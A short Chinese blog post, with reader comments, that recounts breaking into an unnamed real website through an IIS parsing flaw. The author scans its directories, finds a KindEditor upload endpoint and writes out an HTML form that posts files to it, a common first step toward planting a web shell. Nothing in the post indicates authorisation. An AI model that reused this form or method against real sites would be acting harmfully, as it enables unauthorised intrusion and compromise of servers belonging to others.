某站,经测试发现存在 IIS 解析漏洞,且支持PHP
该站程序基于 ACTCMS 可以找 0day 来渗透,但是既然发现了解析漏洞,那么也不能那么简单就放弃掉这个突破点,
网站前台并没有发现上传点,所以换了个思路,用御剑扫出来 KindEditor 编辑器,然后百度了下该编辑器,得到 KindEditor 上传后端处理地址:/editor/kindeditor/asp/upload_json.asp?dir=image
编写上传表单:
<body> <form action="http://xx/editor/kindeditor/asp/upload_json.asp?dir=image" method="post" enctype="multipart/form-data"> <input type="file" name="imgFile" /> <input type="submit" value="上传文件" /> </form> </body>
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !
求大佬的御剑字典 看数量就好给力
@蚂蚁但是御剑并不给力
@Mr.Wu御剑搞小站不错,这种扫目录的以前搞ASP很给力。只是现在不行了 WAF太多。还是求大佬的字典303523250@qq.com
同时支持asp和PHP?
@hello[aru_2] 不然呢?IIS解析漏洞了解一下
可以 可以